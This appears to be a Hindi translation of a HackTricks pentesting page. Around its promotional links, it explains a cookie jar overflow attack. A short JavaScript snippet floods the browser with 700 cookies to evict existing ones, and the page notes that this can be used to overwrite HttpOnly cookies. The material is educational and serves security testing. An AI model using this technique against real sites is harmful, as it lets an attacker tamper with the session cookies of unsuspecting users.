जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके: * यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। * **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।

ब्राउज़रों के पास **पेज के लिए जितने कुकी हो सकते हैं, उस पर सीमा होती है**। इसलिए, यदि किसी कारणवश **किसी कुकी को गायब करने की आवश्यकता** हो, तो आप **कुकी जार को ओवरफ्लो कर सकते हैं** क्योंकि सबसे पुरानी कुकी हटा दी जाएगी: ```javascript // Set many cookies for (let i = 0; i < 700; i++) { document.cookie = `cookie${i}=${i}; Secure`; } // Remove all cookies for (let i = 0; i < 700; i++) { document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`; } ``` ध्यान दें, एक अलग डोमेन पर पोइंट करने वाले थर्ड पार्टी कुकीज को अधिलेखित नहीं किया जाएगा। {% hint style="danger" %} यह हमला **HttpOnly कुकीज को भी ओवरराइट करने के लिए उपयोग किया जा सकता है क्योंकि आप इसे हटा सकते हैं और फिर आप चाहते हैं उस मान के साथ इसे रीसेट कर सकते हैं**। इसे [**इस पोस्ट के साथ एक लैब के साथ जांचें**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/)। {% endhint %}